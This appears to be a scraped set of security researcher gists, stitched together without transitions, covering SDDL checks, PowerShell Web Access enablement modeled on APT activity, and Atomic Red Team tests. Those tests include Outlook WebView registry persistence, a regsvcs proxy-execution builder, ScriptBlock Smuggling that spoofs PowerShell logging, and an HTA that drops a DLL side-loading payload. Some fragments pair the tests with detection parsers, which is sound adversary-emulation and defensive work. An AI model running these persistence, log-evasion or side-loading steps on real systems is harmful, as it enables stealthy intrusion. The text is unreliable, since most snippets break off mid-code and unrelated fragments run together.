
Basic install of Bluetrait RMM software.

| FilePath | FileName | FileSize | LastModified | MD5 | SHA1 | SHA256 | FileVersion | Signature | Signer | Issuer |
|---|---|---|---|---|---|---|---|---|---|---|

SDDL Security Testing and Demonstration Guide

1. Decode an SDDL String (Basic Permissions Breakdown)

Objective: Retrieve and interpret SDDL for a file.

Command:

(Get-Acl C:\Windows\System32\cmd.exe).Sddl
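Added example, not part of the gist and not how Get-Acl itself works: a small SDDL parser in Python that splits the string the command above returns into owner, group, DACL flags and individual ACEs, then flags Allow entries that hand write, delete or ownership bits to low-privilege trustees (Users, Everyone, Authenticated Users, ALL APPLICATION PACKAGES, INTERACTIVE). Both SDDL strings embedded in it are constructed: the first is representative of what the command returns for cmd.exe (owned by TrustedInstaller, everyone else read/execute), the second is a deliberately weak DACL. The SID and rights tables are subsets of the documented SDDL codes.

```python
import re
import sys
from dataclasses import dataclass

# Well-known SID aliases that SDDL uses instead of a full SID (subset).
WELL_KNOWN_SIDS = {
    "BA": "BUILTIN\\Administrators", "BU": "BUILTIN\\Users",
    "SY": "NT AUTHORITY\\SYSTEM", "WD": "Everyone",
    "AU": "NT AUTHORITY\\Authenticated Users", "AC": "ALL APPLICATION PACKAGES",
    "IU": "NT AUTHORITY\\INTERACTIVE", "CO": "CREATOR OWNER",
}
# Trustees every local user is effectively a member of; write access for them is a finding.
LOW_PRIV_TRUSTEES = {"BU", "WD", "AU", "AC", "IU"}

# Two-letter SDDL rights codes to access-mask bits (subset).
RIGHTS_CODES = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
# FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_WRITE_EA, FILE_WRITE_ATTRIBUTES, DELETE,
# WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL: any of these lets the holder
# change the file or its security descriptor.
WRITE_MASK = 0x2 | 0x4 | 0x10 | 0x100 | 0x10000 | 0x40000 | 0x80000 | 0x40000000 | 0x10000000

ACE_TYPES = {"A": "Allow", "D": "Deny", "AU": "Audit", "AL": "Alarm"}

# Constructed, representative SDDL for C:\Windows\System32\cmd.exe (not captured from a live host).
CMD_SDDL = ("O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464"
            "G:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464"
            "D:(A;;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)"
            "(A;;0x1200a9;;;BA)(A;;0x1200a9;;;SY)(A;;0x1200a9;;;BU)(A;;0x1200a9;;;AC)")
# Constructed weak DACL: BUILTIN\Users get modify rights on an executable.
WEAK_SDDL = "O:BAG:SYD:PAI(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x1301bf;;;BU)"


@dataclass
class Ace:
    ace_type: str   # "Allow", "Deny", ...
    flags: str      # inheritance flags as written, e.g. "OICI"
    rights: int     # access mask
    sid: str        # SID or alias exactly as written
    trustee: str    # resolved display name where known


def parse_rights(token: str) -> int:
    """Turn an SDDL rights field ("FA", "GRGX", "0x1200a9", "") into an access mask."""
    if token == "":
        return 0
    if token.lower().startswith("0x"):
        return int(token, 16)
    mask = 0
    for i in range(0, len(token), 2):
        code = token[i:i + 2]
        if code not in RIGHTS_CODES:
            raise ValueError(f"unknown rights code {code!r} in {token!r}")
        mask |= RIGHTS_CODES[code]
    return mask


def parse_sddl(sddl: str) -> dict:
    """Split an SDDL string into owner, group, DACL flags and a list of Ace objects."""
    sections = {}
    markers = list(re.finditer(r"(O|G|D|S):", sddl))
    for i, m in enumerate(markers):
        end = markers[i + 1].start() if i + 1 < len(markers) else len(sddl)
        sections[m.group(1)] = sddl[m.end():end]
    dacl = sections.get("D", "")
    first = dacl.find("(")
    dacl_flags = dacl if first < 0 else dacl[:first]   # e.g. "PAI" = protected, auto-inherited
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl):
        fields = body.split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE: {body!r}")
        ace_type, flags, rights, _object_guid, _inherit_guid, sid = fields[:6]
        aces.append(Ace(ACE_TYPES.get(ace_type, ace_type), flags, parse_rights(rights),
                        sid, WELL_KNOWN_SIDS.get(sid, sid)))
    return {"owner": sections.get("O", ""), "group": sections.get("G", ""),
            "dacl_flags": dacl_flags, "aces": aces}


def find_weak_aces(sddl: str) -> list:
    """Allow ACEs that give a low-privilege trustee any write, delete or ownership bit."""
    return [a for a in parse_sddl(sddl)["aces"]
            if a.ace_type == "Allow" and a.sid in LOW_PRIV_TRUSTEES and a.rights & WRITE_MASK]


if __name__ == "__main__":
    # Pass the output of (Get-Acl <path>).Sddl as the first argument, or use the built-in sample.
    sddl = sys.argv[1] if len(sys.argv) > 1 else CMD_SDDL
    desc = parse_sddl(sddl)
    print("owner:", desc["owner"], "| group:", desc["group"], "| dacl flags:", desc["dacl_flags"])
    for ace in desc["aces"]:
        print(f"  {ace.ace_type:5} {ace.trustee:40} 0x{ace.rights:08x} {ace.flags}")
    for ace in find_weak_aces(sddl):
        print("WEAK:", ace.trustee, "can modify this object")
```

Paste the real string from the command into the script's first argument to check a file on your own host; Deny ACEs are reported but never counted as weak, and hex masks are decoded as-is, so unusual masks still show up in the listing.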

Expected Outcome:

# Enumerate registered file-extension associations under HKLM and HKCU Classes and the ProgID each maps to
$associations = @()
$registryPaths = @(
    "HKLM:\Software\Classes",
    "HKCU:\Software\Classes"
)
foreach ($path in $registryPaths) {
    Get-ChildItem $path -ErrorAction SilentlyContinue | ForEach-Object {
        if ($_.PSChildName -like ".*") {
            $extension = $_.PSChildName
            # The key's default value holds the ProgID the extension resolves to
            $progId = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).'(default)'
            $associations += [PSCustomObject]@{ Extension = $extension; ProgId = $progId; Hive = $path }
        }
    }
}
$associations | Sort-Object Extension | Format-Table -AutoSize
MHaggis / PSWA.md (last active January 22, 2025 18:54)

Enable PowerShell Web Access like an APT

Ref: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a

PowerShell:

# PrivCheck: the remaining steps need an elevated session, so bail out early if not an Administrator
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Warning "Please run this script as an Administrator!"
    Exit
}
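Added example on the defensive side of the same activity, not part of the gist or of the CISA advisory it references: a Python scan over PowerShell script block text (the ScriptBlockText field of Event ID 4104 records) for the three cmdlets that stand PowerShell Web Access up, Install-WindowsFeature WindowsPowerShellWebAccess, Install-PswaWebApplication and Add-PswaAuthorizationRule, and for the two settings an attacker would favour: the -UseTestCertificate switch and wildcard authorization rules. The event records are constructed, not real telemetry; host and user names are placeholders.

```python
import re

# Constructed sample of the ScriptBlockText field from PowerShell Event ID 4104
# (Microsoft-Windows-PowerShell/Operational). Not real telemetry.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "CORP\\svc_backup",
     "text": "Install-WindowsFeature -Name WindowsPowerShellWebAccess -IncludeManagementTools"},
    {"host": "DC01", "user": "CORP\\svc_backup",
     "text": "Install-PswaWebApplication -UseTestCertificate"},
    {"host": "DC01", "user": "CORP\\svc_backup",
     "text": "Add-PswaAuthorizationRule -UserName * -ComputerName * -ConfigurationName *"},
    {"host": "WS07", "user": "CORP\\alice",
     "text": "Get-Process | Where-Object CPU -gt 100"},
]

# Each stage of standing up PSWA is one cmdlet from the PowerShellWebAccess module.
STAGES = [
    ("feature_install", re.compile(r"\b(?:Install|Add)-WindowsFeature\b.*\bWindowsPowerShellWebAccess\b", re.I)),
    ("app_install", re.compile(r"\bInstall-PswaWebApplication\b", re.I)),
    ("auth_rule", re.compile(r"\bAdd-PswaAuthorizationRule\b", re.I)),
]
REQUIRED_STAGES = {stage for stage, _ in STAGES}
# Self-signed test certificate for the PSWA gateway: fine in a lab, suspicious in production.
TEST_CERT_RE = re.compile(r"-UseTestCertificate\b", re.I)
# "*" for user, computer or session configuration opens the gateway to everyone, everywhere.
WILDCARD_RE = re.compile(r"-(UserName|ComputerName|ConfigurationName)\s+\*", re.I)


def scan_events(events):
    """Return one finding per event that runs a PSWA enablement cmdlet."""
    findings = []
    for ev in events:
        for stage, pattern in STAGES:
            if not pattern.search(ev["text"]):
                continue
            notes = []
            if stage == "app_install" and TEST_CERT_RE.search(ev["text"]):
                notes.append("self-signed test certificate")
            if stage == "auth_rule":
                wild = WILDCARD_RE.findall(ev["text"])
                if wild:
                    notes.append("wildcard rule: " + ", ".join(wild))
            findings.append({"host": ev["host"], "user": ev["user"], "stage": stage, "notes": notes})
    return findings


def enablement_chains(findings):
    """Hosts on which all three stages were seen, i.e. PSWA was fully stood up."""
    seen = {}
    for f in findings:
        seen.setdefault(f["host"], set()).add(f["stage"])
    return sorted(host for host, stages in seen.items() if REQUIRED_STAGES <= stages)


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['host']} {f['user']} {f['stage']} {'; '.join(f['notes'])}")
    print("PSWA fully enabled on:", enablement_chains(found))
```

A single stage on its own can be legitimate administration; the chain of all three on one host, a test certificate, or a wildcard rule is what should page someone. Feed it your own 4104 export by replacing SAMPLE_EVENTS with the parsed records.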

Ivanti Virtual Traffic Manager (VTM) Docker Setup

This guide outlines the steps to set up the Ivanti Virtual Traffic Manager (VTM) using Docker.

Prerequisites

Before you begin, ensure you have the following:

  • A system with Docker installed.
  • Docker Hub credentials (if required).
# Atomic Red Team Test: Add URL to Outlook WebView Registry Keys
# Description: This test adds a URL to various Outlook WebView registry keys, which could be used for persistence.
# MITRE ATT&CK Technique: T1112 - Modify Registry
$url = "https://example.com/malicious"
$officeVersions = @("16.0", "15.0", "14.0")
$folders = @("Inbox", "Calendar", "Contacts", "Deleted Items", "Drafts", "Journal", "Junk E-mail", "Notes", "Outbox", "RSS", "Sent Mail", "Tasks", "Today")
foreach ($version in $officeVersions) {
    foreach ($folder in $folders) {
        # Assumed key layout (Outlook Home Page persistence, catalogued by MITRE as T1137.004):
        # HKCU:\Software\Microsoft\Office\<version>\Outlook\WebView\<folder>, string value "URL"
        $key = "HKCU:\Software\Microsoft\Office\$version\Outlook\WebView\$folder"
        New-Item -Path $key -Force | Out-Null
        New-ItemProperty -Path $key -Name "URL" -Value $url -PropertyType String -Force | Out-Null
    }
}
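Added example for hunting what the test above plants, not part of the Atomic test itself: a Python parser for a .reg export (reg export / regedit output) that walks every Outlook WebView\<folder> key and reports those whose URL value is non-empty. The key layout it looks for, HKCU\Software\Microsoft\Office\<version>\Outlook\WebView\<folder> with a string value URL, is an assumption documented in the code, and the embedded export is constructed, not taken from a real host.

```python
import re

# Assumed key layout for Outlook folder home pages (assumption, not taken from the test above):
#   HKCU\Software\Microsoft\Office\<version>\Outlook\WebView\<folder>, REG_SZ value "URL"
# HKEY_USERS\<SID>\... is accepted too so exports of other users' hives can be scanned.
WEBVIEW_KEY_RE = re.compile(
    r"^\[HKEY_(?:CURRENT_USER|USERS\\[^\\\]]+)\\Software\\Microsoft\\Office\\"
    r"(?P<version>\d+\.\d+)\\Outlook\\WebView\\(?P<folder>[^\]\\]+)\]$",
    re.IGNORECASE,
)
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')

# Constructed .reg export, not real system data. Inbox carries a home page, Calendar does not,
# and the Preferences key is unrelated noise the parser must ignore.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\WebView\Inbox]
"URL"="https://example.com/malicious"
"Navigation"="1"

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\WebView\Calendar]
"URL"=""

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Preferences]
"MarkAsRead"=dword:00000001
'''


def unescape_reg_string(data: str) -> str:
    """Strip the quotes of a REG_SZ literal and undo .reg escaping of backslash and quote."""
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        data = data[1:-1]
    return data.replace('\\"', '"').replace("\\\\", "\\")


def find_webview_homepages(reg_text: str) -> list:
    """Return every WebView\\<folder> key in the export whose URL value is non-empty."""
    findings = []
    current = None   # groupdict of the WebView key we are inside, or None for any other key
    for raw in reg_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            m = WEBVIEW_KEY_RE.match(line)
            current = m.groupdict() if m else None
            continue
        if current is None:
            continue
        v = VALUE_RE.match(line)
        if v and v.group("name").lower() == "url":
            url = unescape_reg_string(v.group("data"))
            if url:
                findings.append({"version": current["version"], "folder": current["folder"], "url": url})
    return findings


if __name__ == "__main__":
    for hit in find_webview_homepages(SAMPLE_REG):
        print(f"Office {hit['version']} folder {hit['folder']} home page -> {hit['url']}")
```

Export the hive with reg export HKCU\Software\Microsoft\Office out.reg, convert it from UTF-16 to text, and pass the contents to find_webview_homepages; an empty URL is the normal state, so any non-empty value on a mail folder deserves a look at the page it points to.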
MHaggis / AtomicRedTeam.nsi (created July 29, 2024 18:39)
Compile with NSIS (https://nsis.sourceforge.io/Main_Page). Before compiling, replace the placeholder driver path ("path\to\your\ListOpenedFileDrv_32.sys") with the location of the driver you want to load for testing. Build with .\makensis.exe C:\users\Administrator\Desktop\AtomicRedTeam.nsi or from the NSIS UI.
; NSIS Script for Atomic Red Team Tests (AutoIt, T1218.009, and driver load)
; Source and credit https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/src/T1218.009.cs
!macro T1218_009_CS_CONTENT
FileWrite $0 "using System;$\r$\n\
using System.EnterpriseServices;$\r$\n\
using System.Runtime.InteropServices;$\r$\n\
$\r$\n\
namespace regsvcser$\r$\n\
{$\r$\n\
- name: ScriptBlock Smuggling
  description: This test demonstrates ScriptBlock Smuggling to spoof PowerShell script block logging, so the logged ScriptBlock text shows a benign command while a different command actually executes.
  supported_platforms:
    - windows
  input_arguments:
    spoofed_command:
      description: The benign command to be logged.
      type: string
      default: Write-Output 'Hello'
    executed_command:
local function file_exists(path)
    local file = io.open(path, "r")
    if file then
        file:close()
        return true
    end
    return false
end
print([[
<html>
<head>
<title>Atomic Red Team - DLL Side-Loading HTA</title>
<HTA:APPLICATION ID="AtomicSideLoad" APPLICATIONNAME="AtomicSideLoad" BORDER="thin" BORDERSTYLE="normal" ICON="shell32.dll,4" >
<script language="VBScript">
Dim shell
Set shell = CreateObject("Wscript.Shell")
' Base64 encoded content of invite.zip, which is the payload of https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
Dim base64EncodedContent